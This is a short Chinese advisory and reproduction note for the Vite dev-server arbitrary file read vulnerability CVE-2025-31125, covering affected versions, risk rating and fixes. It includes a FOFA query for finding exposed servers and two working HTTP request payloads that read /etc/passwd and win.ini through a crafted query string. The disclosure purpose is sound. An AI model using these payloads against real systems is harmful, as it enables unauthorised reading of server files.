跳转至

Vite 任意文件读取漏洞(CVE-2025-31125)

漏洞源于 Vite 在处理带有特定查询参数的 URL 时,正则表达式和参数处理逻辑存在缺陷,导致安全检查被绕过。攻击者利用这一缺陷,通过精心构造的请求路径,访问服务器上不在允许访问列表中的文件,Vite 开发服务器需通过 --host 或 server.host 配置选项暴露到网络(默认仅限本地访问)。

影响版本

6.2.0 <= vite <= 6.2.3

6.1.0 <= vite <= 6.1.2

6.0.0 <= vite <= 6.0.12

5.0.0 <= vite <= 5.4.15

vite <= 4.5.10

漏洞状态

漏洞细节 漏洞POC 漏洞EXP 在野利用
已公开 已公开 已知

风险等级

维度 评价
威胁等级 高危
影响面 广
攻击者价值
利用难度

漏洞复现

FOFA:body="/@vite/client"

POC/EXP:

GET /@fs/etc/passwd?import&?inline=1.wasm?init HTTP/1.1
Host: 127.0.0.1

image-20250402155023784

GET /@fs/C://windows/win.ini?import&?inline=1.wasm?init HTTP/1.1
Host: 127.0.0.1

image-20250402155121956

漏洞修复

关闭互联网暴露面或接口设置访问权限

升级至安全版本